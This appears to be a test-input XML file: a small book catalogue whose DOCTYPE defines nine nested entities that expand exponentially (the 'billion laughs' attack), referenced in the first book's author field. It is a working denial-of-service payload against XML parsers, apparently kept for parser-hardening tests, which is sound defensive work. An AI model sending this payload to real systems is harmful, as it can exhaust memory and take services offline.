<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE urn:books [
        <!ENTITY lol "lol">
        <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
        <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
        <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
        <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
        <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
        <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
        <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
        <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
        ]>
<urn:books xmlns:urn="urn:demo.com:books"
           xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
           xsi:schemaLocation="books.xsd" >
  <!--1 to 100 repetitions:-->
  <book id="10">
      <author>&lol9;</author>
      <title>Some title here</title>
      <price>23.00</price>
      <publish_date>1920-01-01</publish_date>
      <virtual-library-path>D:\java.exe</virtual-library-path>
  </book>
    <book id="20">
        <author>Author 2</author>
        <title>Another title here</title>
        <price>30.00</price>
        <publish_date>1990-01-01</publish_date>
        <virtual-library-path>D:\program files\Java\java.exe</virtual-library-path>
    </book>
</urn:books>